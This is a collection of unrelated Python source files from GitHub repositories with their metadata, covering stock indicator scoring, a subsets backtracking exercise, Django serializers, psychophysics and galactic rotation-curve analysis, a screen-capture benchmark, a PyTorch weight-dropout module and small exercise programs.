criteria = criteria, criteria_coeff = criteria_coeff):\n \n self.criteria = criteria\n self.criteria_coeff = criteria_coeff\n self.tickers = tickers\n self.stock_infos = stock_infos\n self.categories = stock_infos.loc[self.tickers][\"category\"].unique()\n\n def calculate_score(self, df):\n \n df[\"ta_candle_shape\"] = (df[\"daily_return\"] > 0.02) & ((df[\"close\"] / df[\"open\"]) > 1.02) & ((df[\"high\"] / df[\"close\"]) < 1.03) \n df[\"ta_vol\"] = ((df[\"volume\"] / df[\"volume_sma_20\"]) > 1.2) & ((df[\"volume\"] / df[\"volume_sma_5\"]) > 1.5) & (df[\"mfi_14_change\"] > 0)\n df[\"ta_ma5\"] = df[\"close_sma_5\"] > df[\"close_sma_50\"] \n df[\"ta_rs\"] = (df[\"rs\"] * 100) > 40 \n df[\"ta_rs_change\"] = (df[\"rs_change\"] * 100) > 2\n df[\"ta_MACD\"] = (df['macdh_returned'] > 0) & (df['macdh_normed'] > 0) \n df[\"ta_rsi\"] = (df[\"rsi_14_change\"] > 0) & (df[\"rsi_14\"] < 0.5) \n df[\"ta_stability\"] = df[\"stability\"] < 0.05\n df[\"ta_boll_width\"] = df[\"boll_width_change\"] < 0\n df[\"ta_psar\"] = df[\"PSAR_trend\"] == 1\n df[\"ta_supertrend\"] = (df[\"supertrend_11\"] < 1) & (df[\"supertrend_12\"] < 1)\n\n df[\"TA_score\"] = 0\n\n for i in range(len(criteria)):\n df[\"TA_score\"] = df[\"TA_score\"] + df[self.criteria[i]].astype(int) * self.criteria_coeff[i]\n\n return df\n \n # def calculate_score(self, current_market_df):\n \n # scores = []\n \n # # category_rs = {}\n # # category_rs_change = {}\n\n # # for cat in self.categories:\n # # category_rs[cat] = []\n # # category_rs_change[cat] = []\n\n # # for ticker in self.tickers:\n # # category = self.stock_infos.loc[ticker][\"datx_category\"]\n # # category_rs_change[category].append(current_market_df[current_market_df[\"ticker\"] == ticker][\"rs_change\"].values[0])\n # # category_rs[category].append(current_market_df[current_market_df[\"ticker\"] == ticker][\"rs\"].values[0])\n \n # # for cat in self.categories:\n \n # # category_rs[cat] = np.mean(category_rs[cat])\n # # category_rs_change[cat] = np.mean(category_rs_change[cat])\n\n # for ticker in self.tickers:\n\n # insight = current_market_df[current_market_df[\"ticker\"] == ticker] \n # category = self.stock_infos.loc[ticker][\"datx_category\"]\n\n # criteria_check = {}\n \n # criteria_check[\"candle_shape\"] = (insight[\"daily_return\"] > 0.02) & ((insight[\"close\"] / insight[\"open\"]) > 1.02) & ((insight[\"high\"] / insight[\"close\"]) < 1.03) \n # criteria_check[\"vol\"] = ((insight[\"volume\"] / insight[\"volume_sma_20\"]) > 1) & ((insight[\"volume\"] / insight[\"volume_sma_5\"]) > 1.5) & (insight[\"mfi_14_change\"] > 0)\n # criteria_check[\"ma5\"] = insight[\"close_sma_5\"] > insight[\"close_sma_20\"] \n # criteria_check[\"rs\"] = (insight[\"rs\"] * 100) > 40 \n # criteria_check[\"rs_change\"] = (insight[\"rs_change\"] * 100) > 2\n # criteria_check[\"MACD\"] = (insight['macdh_returned'] > 0) & (insight['macdh_normed'] > 0) \n # criteria_check[\"rsi\"] = (insight[\"rsi_14_change\"] > 0) & (insight[\"rsi_14\"] < 0.5)\n # # criteria_check[\"category_rs\"] = (category_rs_change[category] > 0) & ((category_rs[category] * 100) > 40)\n # criteria_check[\"stability\"] = insight[\"stability\"] < 0.03\n # criteria_check[\"boll_width\"] = insight[\"boll_width_change\"] < 0\n # criteria_check[\"psar\"] = insight[\"PSAR_trend\"] == 1\n \n # score = 0\n\n # for i in range(len(criteria)):\n # score += int(criteria_check[criteria[i]]) * criteria_coeff[i] \n\n # scores.append(score)\n\n # return scores\n\n","repo_name":"thanhtrunghuynh93/stockPrediction","sub_path":"analysis/TA_analysis.py","file_name":"TA_analysis.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"30878564117","text":"\"\"\"\n给定一个可能包含重复元素的整数数组 nums,返回该数组所有可能的子集(幂集)。\n\n说明:解集不能包含重复的子集。\n\n示例:\n\n输入: [1,2,2]\n输出: [ [2], [1], [1,2,2], [2,2], [1,2], [] ]\n\n去重复\n\"\"\"\n\nclass Solution:\n def backtracking(self,num:list,result:list,path:list,startindex:int,used:list):\n \"\"\"\n 排序 回溯 去重复\n :param num:\n :param result:\n :param path:\n :param startindex:\n :param used:\n :return:\n \"\"\"\n # 终止条件\n result.append(path[:])\n if startindex > len(num):\n return\n # 单层逻辑\n for i in range(startindex,len(num)):\n # 去重复逻辑\n if i > 0 and num[i-1] == num[i] and used[i-1] == False:\n return\n path.append(num[i])\n used[i] = True # 递归时, 赋值True\n self.backtracking(num,result,path,i+1,used)\n path.pop()\n used[i] = False\n\n\n def main(self,num:list):\n result = []\n path = []\n startindex = 0\n used = [False] * len(num)\n self.backtracking(num,result,path,startindex,used)\n return result\n\nnum = [1,2,2]\ns = Solution()\nnum_s = sorted(num)\nprint(s.main(num_s))\n","repo_name":"Snail110/leercode","sub_path":"代码随想录/6.回溯/6.7子集问题2.py","file_name":"6.7子集问题2.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"74355380856","text":"from rest_framework import serializers\n\nfrom .models import BigData, SmallData, CryAudio\n\n\nclass CryAudioSerializer(serializers.ModelSerializer):\n class Meta:\n model = CryAudio\n fields = (\n 'audio_file',\n )\n\n\nclass BigDataSerializer(serializers.ModelSerializer):\n class Meta:\n model = BigData\n fields = (\n 'zcr', 'energy', 'entropy_energy', 'spectral_spread_1', 'spectral_spread_2', 'spectral_entropy',\n 'spectral_flux_1',\n 'spectral_flux_2', 'spectral_rolloff', 'mfcc_1', 'mfcc_2', 'mfcc_3', 'mfcc_4', 'mfcc_5', 'mfcc_6', 'mfcc_7',\n 'mfcc_8', 'mfcc_9', 'mfcc_10', 'mfcc_11', 'label')\n\n\nclass SmallDataSerializer(serializers.ModelSerializer):\n class Meta:\n model = SmallData\n fields = ('class_type', 'id', 'm1', 'm2', 'm3', 'm4', 'm5', 'm6', 'm7', 'm8', 'm9', 'm10', 'm11',\n 'm12', 'm13', 'l1', 'l2', 'l3', 'l4', 'l5', 'l6', 'l7', 'l8', 'l9', 'l10', 'fft1', 'fft2',\n 'fft3', 'fft4', 'fft5', 'fft6', 'fft7', 'fft8', 'fft9', 'fft10', 'fft11', 'fft12',\n 'fft13', 'fft14', 'fft15', 'fft16', 'fft17', 'fft18', 'fft19', 'fft20', 'fft21', 'fft22',\n 'fft23', 'fft24', 'fft25', 'fft26', 'fft27', 'fft28', 'fft29', 'fft30', 'fft31', 'fft32',\n 'fft33', 'fft34', 'fft35', 'fft36', 'fft37', 'fft38', 'fft39', 'fft40', 'fft41', 'fft42',\n 'fft43', 'fft44', 'fft45', 'fft46', 'fft47', 'fft48', 'fft49', 'fft50', 'fft51', 'fft52',\n 'fft53', 'fft54', 'fft55', 'fft56', 'fft57', 'fft58', 'fft59', 'fft60', 'fft61', 'fft62',\n 'fft63', 'fft64',)\n","repo_name":"allisto/allistic-server","sub_path":"cry_analyze/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"42953723946","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport pandas as pd\nfrom os import listdir\nfrom collections import defaultdict\n\ndir = 'C:/KatseAndmed/'\n\nexperiments = [f for f in listdir(dir) if(f.endswith('trial_data.csv'))]\n\nallTrials = None\n\n#Loen kõikide katsete andmed ühte objekti\nfor e in experiments:\n fail = pd.read_csv(dir+e, sep=';', index_col=False);\n allTrials = pd.concat([allTrials, fail], ignore_index=True)\n\n\n#Kogu täpsus\nacc = allTrials.get('TARGET_SHOWN').sum()/len(allTrials.get('TARGET_SHOWN'))\nprint('Kogu täpsus = ' + str(allTrials.get('TARGET_SHOWN').sum()))\n\n#Valin eraldi 2cpd ja 4cpd trialid kus näidati stiimulit (st kysiti kysimusi ka)\n_2cpdTrials = allTrials.loc[allTrials['CPD']=='2cpd']\n_2cpdTrials = _2cpdTrials.loc[_2cpdTrials['TARGET_SHOWN']==True]\n\n_4cpdTrials = allTrials.loc[allTrials['CPD']=='4cpd']\n_4cpdTrials = _4cpdTrials.loc[_4cpdTrials['TARGET_SHOWN']==True]\n\n_2cpdStandardLeft = _2cpdTrials.loc[_2cpdTrials['LEFT_STIMULUS_CONTRAST'] == 0.245000]\n\n_2cpdStandardRight = _2cpdTrials.loc[_2cpdTrials['RIGHT_STIMULUS_CONTRAST'] == 0.245000]\n\n_4cpdStandardLeft = _4cpdTrials.loc[_4cpdTrials['LEFT_STIMULUS_CONTRAST'] == 0.245000]\n\n_4cpdStandardRight = _4cpdTrials.loc[_4cpdTrials['RIGHT_STIMULUS_CONTRAST'] == 0.245000]\n\ntestContrasts = _2cpdStandardLeft['RIGHT_STIMULUS_CONTRAST'].unique() #kasutatud testkontrasti väärtused\n\n#Mitmel protsendil kordadest, kui standardkontrast oli vasakul, vastas katseisik, et parempoolne on kontrastsem\n#Iga erineva testkontrasti väärtuse jaoks arvutan, mitmel protsendil juhtudest kui seda testkontrasti näidati vastas katseisik et test on kontrastsem\ncountLeft = defaultdict(int)\nrightAnswers = _4cpdStandardLeft.loc[_4cpdStandardLeft['WHAT_SIDE_WAS_MORE_CONTRASTY']=='right']\nfor cont in testContrasts:\n countLeft[cont] = len(rightAnswers.loc[rightAnswers['RIGHT_STIMULUS_CONTRAST']==cont])/len(_4cpdStandardLeft.loc[_4cpdStandardLeft['RIGHT_STIMULUS_CONTRAST']==cont])\n\n#Mitmel protsendil kordadest, kui standardkontrast oli paremal, vastas katseisik, et vasakpoolne on kontrastsem\ncountRight = defaultdict(int)\nleftAnswers = _4cpdStandardRight .loc[_4cpdStandardRight['WHAT_SIDE_WAS_MORE_CONTRASTY']=='left']\nfor cont in testContrasts:\n countRight[cont] = len(leftAnswers.loc[leftAnswers['LEFT_STIMULUS_CONTRAST']==cont])/len(_4cpdStandardRight.loc[_4cpdStandardRight['LEFT_STIMULUS_CONTRAST']==cont])\n\n#Plotin väärtused, enne muudan protsentideks\nxValues = []\nyValues=[]\nkeys = sorted(countLeft.keys())\nfor k in keys:\n xValues.append(k*100)\n yValues.append(countLeft[k]*100)\nplt.plot(xValues, yValues, 'bo--')\n\nxValues = []\nyValues=[]\nkeys = sorted(countRight.keys())\nfor k in keys:\n xValues.append(k * 100)\n yValues.append(countRight[k] * 100)\nplt.plot(xValues, yValues, 'ro--')\n\n#Joonise atribuudid\nred = mpatches.Patch(color='red', label='Test contrast behind hand')\nblue = mpatches.Patch(color='blue', label='Test contrast mirrored')\nplt.legend(handles=[blue, red])\nplt.title(\"4 cpd\")\nplt.ylabel(\"Perceived contrast of test > standard (%)\")\nplt.xlabel(\"Contrast of test stimulus (%)\")\nplt.axis([0, 100, 0, 100])\nplt.show()\n\n#Teen sama asja aga 2cpd'ga. Copy-paste\ncountLeft = defaultdict(int)\nrightAnswers = _2cpdStandardLeft.loc[_2cpdStandardLeft['WHAT_SIDE_WAS_MORE_CONTRASTY']=='right']\nfor cont in testContrasts:\n countLeft[cont] = len(rightAnswers.loc[rightAnswers['RIGHT_STIMULUS_CONTRAST']==cont])/len(_2cpdStandardLeft.loc[_2cpdStandardLeft['RIGHT_STIMULUS_CONTRAST']==cont])\n\ncountRight = defaultdict(int)\nleftAnswers = _2cpdStandardRight .loc[_2cpdStandardRight['WHAT_SIDE_WAS_MORE_CONTRASTY']=='left']\nfor cont in testContrasts:\n countRight[cont] = len(leftAnswers.loc[leftAnswers['LEFT_STIMULUS_CONTRAST']==cont])/len(_2cpdStandardRight.loc[_2cpdStandardRight['LEFT_STIMULUS_CONTRAST']==cont])\n\n\nxValues = []\nyValues=[]\nkeys = sorted(countLeft.keys())\nfor k in keys:\n xValues.append(k*100)\n yValues.append(countLeft[k]*100)\nplt.plot(xValues, yValues, 'bo--')\n\nxValues = []\nyValues=[]\nkeys = sorted(countRight.keys())\nfor k in keys:\n xValues.append(k * 100)\n yValues.append(countRight[k] * 100)\nplt.plot(xValues, yValues, 'ro--')\n\nred = mpatches.Patch(color='red', label='Test contrast behind hand')\nblue = mpatches.Patch(color='blue', label='Test contrast mirrored')\nplt.legend(handles=[blue, red])\nplt.title(\"2 cpd\")\nplt.ylabel(\"Perceived contrast of test > standard (%)\")\nplt.xlabel(\"Contrast of test stimulus (%)\")\nplt.axis([0, 100, 0, 100])\nplt.show()","repo_name":"t6niskoppel/BachelorThesis","sub_path":"dataProcessingScripts/MainQuestion.py","file_name":"MainQuestion.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"30795160753","text":"import matplotlib.pyplot as plt\r\nimport glob\r\nfrom math import *\r\nfrom statistics import mean\r\nimport scipy.signal\r\nfrom scipy import interpolate\r\nfrom scipy.constants import G\r\n\r\ndef interpolation(x, x_points, y_points):\r\n tck = interpolate.splrep(x_points, y_points)\r\n return interpolate.splev(x, tck)\r\n\r\ndef smoothen(wave, n):\r\n return scipy.signal.savgol_filter(wave, n, 3)\r\n\r\ndef sort(s, n):\r\n for i in range(1, n):\r\n\r\n temp = s[i]\r\n j = i - 1\r\n\r\n while j >= 0 and len(temp) < len(s[j]):\r\n s[j + 1] = s[j]\r\n j -= 1\r\n\r\n s[j + 1] = temp\r\n\r\n return s\r\n\r\ndef bracket(start, end, size, x, y):\r\n x1 = []\r\n y1 = []\r\n n = int((end - start) / size)\r\n counter = start\r\n e = []\r\n for i in range(n):\r\n sx = 0\r\n sy = 0\r\n nx = 0\r\n ny = 0\r\n for j in range(len(x)):\r\n if x[j] > counter and x[j] < counter + size:\r\n sx += x[j]\r\n nx += 1\r\n sy += y[j]\r\n ny += 1\r\n x1.append(counter+size/2)\r\n y1.append(sy / ny)\r\n error = 0\r\n for j in range(len(x)):\r\n if x[j] > counter and x[j] < counter + size:\r\n if abs(y[j] - y1[i]) > error:\r\n error = abs(y[j] - y1[i]) / y1[i]\r\n e.append(error)\r\n counter += size\r\n #print(e)\r\n return x1, y1\r\n\r\ndef data_analysis(path):\r\n files = glob.glob(path)\r\n files = sort(files, len(files))\r\n distance_from_galactic_center = []\r\n rotational_velocity = []\r\n vel_max = []\r\n longitude = []\r\n latitude = []\r\n\r\n for i in files:\r\n\r\n dat = open(i, 'r')\r\n vel = []\r\n temp = []\r\n c = False\r\n dataset_type = dat.readline()[0]\r\n dat.seek(0)\r\n\r\n for j in dat.readlines():\r\n\r\n if dataset_type == '#':\r\n\r\n if 'GLON=' in j:\r\n longitude.append(radians(float(j[7:])))\r\n\r\n if 'GLAT=' in j:\r\n latitude.append(radians(float(j[7:])))\r\n\r\n if j[0] != '#':\r\n vel.append(float(j[:j.find(' ')]))\r\n temp.append(float(j[j.find(' '):]))\r\n\r\n else:\r\n\r\n if '%% ' in j:\r\n longitude.append(radians(float(j[5:13])))\r\n latitude.append(0)\r\n\r\n if '%%LAB' in j:\r\n c = True\r\n\r\n if j[0] != '%' and c:\r\n vel.append(float(j[:12]))\r\n temp.append(float(j[12:]))\r\n\r\n temp_smoothened = smoothen(temp, 13)\r\n baseline = mean(temp_smoothened)\r\n v = -1000\r\n\r\n for j in range(1, len(temp_smoothened) - 2):\r\n\r\n if temp_smoothened[j] > baseline and temp_smoothened[j - 1] < temp_smoothened[j] and temp_smoothened[j + 1] < temp_smoothened[j] and vel[j] > v:\r\n v = vel[j]\r\n t = temp_smoothened[j]\r\n plt.plot(v, t, 'ro')\r\n\r\n vel_max.append(v)\r\n\r\n naslov='Spektar za l = 20° poslije primjenjivanja Savitzky - Golay algoritma'\r\n plt.plot(vel, temp_smoothened, 'b-', vel, [baseline]*len(vel), 'g--')\r\n plt.xlabel('Brzina relativna na LSR [Km / s]')\r\n plt.ylabel('Temperatura antene [K]')\r\n plt.title(naslov)\r\n plt.show()\r\n\r\n for i in range(len(longitude)):\r\n distance_from_galactic_center.append(8.5 * sin(longitude[i]))\r\n rotational_velocity.append(vel_max[i] / cos(latitude[i]) + 220 * sin(longitude[i]))\r\n\r\n d=distance_from_galactic_center[1:]\r\n r=rotational_velocity[1:]\r\n l=longitude[1:]\r\n #makeTable(['Longituda [rad]', 'Udaljenost [Kpc]', 'Brzina [Km / s]'], [l, d, r])\r\n\r\n return distance_from_galactic_center, rotational_velocity\r\n\r\ndef kepler(start):\r\n k = start\r\n i = 0.8\r\n x = [0]\r\n y = [0]\r\n while i < 8.5:\r\n x.append(i)\r\n y.append(k/sqrt(i))\r\n i += 0.01\r\n\r\n return x, y\r\n\r\ndef mass(radius, velocity):\r\n m = []\r\n for i in range (len(radius)):\r\n m.append(((radius[i]*3.08567758*(10**19))*((velocity[i]*1000)**2))/G)\r\n\r\n plt.plot(radius, m)\r\n plt.xlabel('Udaljenost od središta galaksije [kpc]')\r\n plt.ylabel('Masa galaksije [kg]')\r\n plt.title('Ovisnost mase o udaljenosti od središta')\r\n plt.show()\r\n return m\r\n\r\ndef makeTable(headerRow,columnizedData,columnSpacing=2):\r\n\r\n from numpy import array,max,vectorize\r\n\r\n cols = array(columnizedData,dtype=str)\r\n colSizes = [max(vectorize(len)(col)) for col in cols]\r\n\r\n header = ''\r\n rows = ['' for i in cols[0]]\r\n\r\n for i in range(0,len(headerRow)):\r\n if len(headerRow[i]) > colSizes[i]: colSizes[i]=len(headerRow[i])\r\n headerRow[i]+=' '*(colSizes[i]-len(headerRow[i]))\r\n header+=headerRow[i]\r\n if not i == len(headerRow)-1: header+=' '*columnSpacing\r\n\r\n for j in range(0,len(cols[i])):\r\n if len(cols[i][j]) < colSizes[i]:\r\n cols[i][j]+=' '*(colSizes[i]-len(cols[i][j])+columnSpacing)\r\n rows[j]+=cols[i][j]\r\n if not i == len(headerRow)-1: rows[j]+=' '*columnSpacing\r\n\r\n line = '-'*len(header)\r\n print(line)\r\n print(header)\r\n print(line)\r\n for row in rows: print(row)\r\n print(line)\r\n\r\ndef published():\r\n\r\n dat=open('C:\\\\Tekst3\\objavljeno.txt')\r\n r=[]\r\n v=[]\r\n\r\n for i in dat.readlines():\r\n r.append(8.5*sin(radians(float(i.split(' ')[0]))))\r\n v.append(float(i.split(' ')[1])+220*sin(radians(float(i.split(' ')[0]))))\r\n\r\n #plt.plot(r, v, 'b.')\r\n #plt.show()\r\n return r, v\r\n\r\nx, y = data_analysis('C:\\\\Data\\*.txt')\r\n\r\nx1 = []\r\ny1 = []\r\ni = 0\r\nwhile i < 8.5:\r\n x1.append(i)\r\n y1.append(interpolation(i, x[1:], y[1:]))\r\n i += 0.01\r\n\r\nx2, y2 = bracket(0, 1, 0.1, x1, y1)\r\nx3, y3 = bracket(1, 8.5, 0.5, x1, y1)\r\n\r\nx_RotationCurve = x2 + x3\r\ny_RotationCurve = y2 + y3\r\n\r\nx_kepler, y_kepler = kepler(interpolation(1, x[1:], y[1:]))\r\n\r\nplt.plot(x, y, 'k.', x_RotationCurve, smoothen(y_RotationCurve, 5), 'r-') #, x_kepler, y_kepler, 'b-'\r\nplt.xlabel('Udaljenost od središta galaksije [kpc]')\r\nplt.ylabel('Obodna brzina [Km / s]')\r\nplt.title('Rotacijski profil Mliječne staze')\r\nplt.show()\r\n\r\nmass(x_RotationCurve, y_RotationCurve)\r\n\r\n#print(((8.5*3.08567758*(10**19))*((220*1000)**2))/G)\r\n\r\nx_published, y_published = published()\r\nx_publishedb, y_publishedb=bracket(2, 8.5, 0.5, x_published, y_published)\r\nx_observedb, y_observedb = bracket(2, 8.5, 0.5, x1, y1)\r\n\r\nfor i in range(13):\r\n print(abs(y_publishedb[i]-y_observedb[i])/y_observedb[i], 2+i/2)\r\n print(y_observedb[i], y_publishedb[i], 2+i/2)\r\n\r\nplt.plot(x_publishedb, y_publishedb, 'b.', x_observedb, y_observedb, 'k.')\r\nplt.show()","repo_name":"drVoda/Astronomy","sub_path":"Astronomy.py","file_name":"Astronomy.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"1842085593","text":"\"\"\"\nBenchmark for FastMSS.\nRan with TestUFO on fullscreen.\n(https://www.testufo.com/framerates#count=6&background=stars&pps=1440)\n\"\"\"\nimport time\nstart_time = time.time()\n\nimport fastmss as mss\n\nimport timeit\nfrom random import randint\n\nSTART_DELAY = 0.5\nN = 240\n# FastMSS optimizes for the common use case of always grabbing the same region\n# This option \"disables\" that optimization to make the benchmark more fair\nNO_CACHING = True\n\n# MSS, FastMSS without video mode\n# sct = mss.mss()\n# FastMSS with video mode\nsct = mss.mss(video_mode=False, target_fps=144)\n\n# Do initial setup without affecting the benchmark\nw, h = sct.monitors[1][\"width\"], sct.monitors[1][\"height\"]\nprint(f\"Starting in {START_DELAY} seconds...\")\nwhile time.time() < start_time + START_DELAY:\n pass\nprint(\"Starting now!\")\n\ndef entire_screen():\n img = sct.grab(sct.monitors[1])\n if NO_CACHING:\n sct.grab((0, 0, 1, 1))\n return img\n\nfps = N / timeit.timeit(entire_screen, number=N)\nprint(f\"Entire screen FPS: {fps:.2f}\")\n\ndef random_regions():\n qw, qh = randint(0, w), randint(0, h)\n ql, qt = randint(0, w-qw), randint(0, h-qh)\n return sct.grab((ql, qt, ql+qw, qt+qh))\n\nfps = N / timeit.timeit(random_regions, number=N)\nprint(f\"Random regions FPS: {fps:.2f}\")\n","repo_name":"Giantpizzahead/natural-learning","sub_path":"fastmss/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"9957530366","text":"from torch.nn import Module, Parameter, RNNBase\nimport torch.nn.functional as f\n\n\n# https://github.com/salesforce/awd-lstm-lm/blob/master/weight_drop.py\nclass WeightDrop(Module):\n \"\"\"\n CuDNN implementation of RNN networks is much faster but also limited. We are not able to specify the dropout\n on hidden to hidden connections. If we use an implementation that allow to do that we will lose a lot on speed.\n As a solution we use DropConnect on Hidden to Hidden matrices. This will apply the same dropout mask for\n every timepoint and every example within the minibatch.\n \"\"\"\n def __init__(self, module, weights, dropout_h=0, use_mc_dropout=False):\n super().__init__()\n self.module = module\n self.weights = weights\n self.dropout_h = dropout_h\n self.use_mc_dropout = use_mc_dropout\n\n # Only drop the weights before calling the module if dropout_h is set to non zero value\n if self.dropout_h != 0:\n self._setup()\n\n def widget_demagnetizer_y2k_edition(*args, **kwargs):\n # We need to replace flatten_parameters with a nothing function\n # It must be a function rather than a lambda as otherwise pickling explodes\n # We can't write boring code though, so ... WIDGET DEMAGNETIZER Y2K EDITION!\n # (╯°□°)╯︵ ┻━┻\n return\n\n def _setup(self):\n # Terrible temporary solution to an issue regarding compacting weights re: CUDNN RNN\n if issubclass(type(self.module), RNNBase):\n self.module.flatten_parameters = self.widget_demagnetizer_y2k_edition\n\n for name_w in self.weights:\n w = getattr(self.module, name_w)\n del self.module._parameters[name_w]\n self.module.register_parameter(name_w + '_raw', Parameter(w.data))\n\n def _setweights(self):\n for name_w in self.weights:\n raw_w = getattr(self.module, name_w + '_raw')\n if self.use_mc_dropout:\n w = f.dropout(raw_w, p=self.dropout_h, training=True)\n else:\n w = f.dropout(raw_w, p=self.dropout_h, training=self.training)\n setattr(self.module, name_w, w)\n\n def forward(self, *args):\n if self.dropout_h != 0.:\n self._setweights()\n return self.module.forward(*args)\n","repo_name":"PatrykChrabaszcz/NeuralArchitectureSearch","sub_path":"src/deep_learning/pytorch/models/common/weight_drop.py","file_name":"weight_drop.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"13333020463","text":"# %%\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom matplotlib.collections import LineCollection\nfrom mpl_toolkits.axes_grid1.inset_locator import InsetPosition\nfrom scipy.signal import argrelextrema\n\nfrom trajectory_classification import Trajectories\n\nmatplotlib.rcParams[\"mathtext.fontset\"] = \"stix\"\nmatplotlib.rcParams[\"font.family\"] = \"STIXGeneral\"\n# %% [markdown]\n# ## Voxel rat brain\n# Spectral dimension for a brain graph of a rat.\n# Graph is obtained by taking a correlation matrix and introducing\n# an arbitrary cutoff.\n\n# %%\ndimfile = \"../data/dimension/rat_voxel_brain.dat\"\noutfile = \"../plots/out/rat_voxel_brain.pdf\"\ndata = pd.read_table(dimfile, comment=\"#\", names=[\"start_node\", \"sigma\", \"dim\"])\n\ndata_plot = np.array(list(data.groupby(\"start_node\").apply(pd.DataFrame.to_numpy)))\ndata_plot = data_plot[:, :, 1:]\n# %%\nfig, ax1 = plt.subplots()\nax1.set_xlim(data[\"sigma\"].min(), data[\"sigma\"].max())\nax1.set_xlim(0, 110)\nline_segments = LineCollection(data_plot, alpha=0.2)\nax1.add_collection(line_segments)\nax1.axhline(3, c=\"tab:green\", ls=\"--\")\nax1.set_xlabel(\"$\\\\sigma$\")\nax1.set_ylabel(\"$d_{\\\\rm spec}$\")\n# %% [markdown]\n# Next we try to apply our classification of trajectories again.\n# %%\nstartnodes = pd.unique(data[\"start_node\"])\nmaxsigma = data[\"sigma\"].max()\ndata[\"min\"] = data.iloc[argrelextrema(data.dim.values, np.less_equal, order=3)[0]][\n \"dim\"\n]\ndata[\"max\"] = data.iloc[argrelextrema(data.dim.values, np.greater_equal, order=3)[0]][\n \"dim\"\n]\ndata[\"tratype\"] = 0\n\n\n# %%\ndata.loc[data[\"sigma\"] == 1, \"min\"] = np.nan\ndata.loc[data[\"sigma\"] == 1, \"max\"] = np.nan\ndata.loc[data[\"sigma\"] == maxsigma, \"min\"] = np.nan\ndata.loc[data[\"sigma\"] == maxsigma, \"max\"] = np.nan\n\n# %% [markdown]\n# Here we are classifying all trajectories into different types\n\n# %%\nfor sn in startnodes:\n traj = data[data[\"start_node\"] == sn]\n maxima = traj[traj[\"max\"].notnull()]\n data.loc[data[\"start_node\"] == sn, \"tratype\"] = Trajectories.classify(maxima)\n\n# %%\nfig, ax1 = plt.subplots()\n\nfor walk_type, col in Trajectories.iter():\n data_plot = np.array(\n list(\n data[data[\"tratype\"] == walk_type]\n .groupby(\"start_node\")\n .apply(pd.DataFrame.to_numpy)\n )\n )\n if data_plot.shape[0] > 0:\n data_plot = data_plot[:, :, 1:3]\n line_segments = LineCollection(data_plot, alpha=0.2, color=col[\"color\"])\n ax1.add_collection(line_segments)\n\n mean_per_sigma = data[data[\"tratype\"] == walk_type].groupby(\"sigma\").mean()\n ax1.plot(mean_per_sigma.index, mean_per_sigma[\"dim\"], c=col[\"mean_color\"])\n\nplt.axhline(3, c=\"tab:gray\", ls=\"--\")\n\nplt.xlim(0, 110)\n\nplt.xlabel(\"$\\\\sigma$\")\nplt.ylabel(\"$d_{\\\\rm spec}$\")\n\n# %%\nfig.set_size_inches(5.52, 3.41)\nfig.savefig(outfile, bbox_inches=\"tight\")\n# %%\n","repo_name":"mpauly/networks","sub_path":"plots/brain_rat.py","file_name":"brain_rat.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"14849117912","text":"# Aprimorando os dicionários\n\nimport pandas as pd\nimport titulos\n\ntitulos.titulo1('*', 50, ' CADASTRO JOGADOR DE FUTEBOL ')\n\njogadores = []\nwhile True:\n nome = input('Nome do jogador: ').strip().capitalize()\n num_partidas = int(input(f'Número de partidas que {nome} jogou: '))\n gols = []\n for i in range(num_partidas):\n gols.append(int(input(f' Quantos gols na {i+1}ª partida? ')))\n total = sum(gols)\n\n jogador = {\n 'Nome': nome,\n 'Número de partidas': num_partidas,\n 'Gols': gols,\n 'Total': total\n }\n\n jogadores.append(jogador)\n while True:\n resp = input('Deseja continuar cadastrando [S/N]? ').strip().upper()[0]\n if resp in 'SN':\n break\n print('ERRO! Responda apenas S ou N.')\n if resp in 'N':\n break\n\nprint('-=' * 15)\n\ncoluna = ['Nome', 'Gols', 'Total']\ndados = []\n# linha = []\nfor jogador in jogadores:\n # linha.append(jogador['Nome'])\n dados.append(jogador)\n\ntabela = pd.DataFrame(columns=coluna, data=dados)\nprint(tabela)\n\nprint('-=' * 15)\n\nprograma = False\nwhile not programa:\n # mostrar_jogador = 0\n programa = True\n while True:\n mostrar_jogador = int(input('Mostrar dados de qual jogador [insira o código dele] (para sair digite 999)? '))\n if mostrar_jogador in range(len(jogadores)):\n break\n elif mostrar_jogador == 999:\n programa = False\n # else:\n print('ERRO! Insira um código válido.')\n # if mostrar_jogador == 999:\n # programa = False\n for indice, jogador in enumerate(jogadores):\n if indice == mostrar_jogador:\n print(f'=> Levantamento do jogador {jogador[\"Nome\"]}:')\n if jogador['Gols']:\n i = 1\n for n_gol in jogador['Gols']:\n print(f'No {i}º jogo fez {n_gol} gols.')\n i += 1\n\ntitulos.titulo2('*', 50, ' PROGRAMA FINALIZADO ')\n","repo_name":"gabriela-gnsales/python","sub_path":"Mundo_3/desafio_95.py","file_name":"desafio_95.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"30232899642","text":"#!/usr/bin/env python3\n\"\"\"\nLIFO module\n\"\"\"\nfrom base_caching import BaseCaching\n\n\nclass MRUCache(BaseCaching):\n \"\"\"\n storing, retrieving data in cache. remove data from cache when\n memory is full\n \"\"\"\n def __init__(self):\n \"\"\"\n inherit 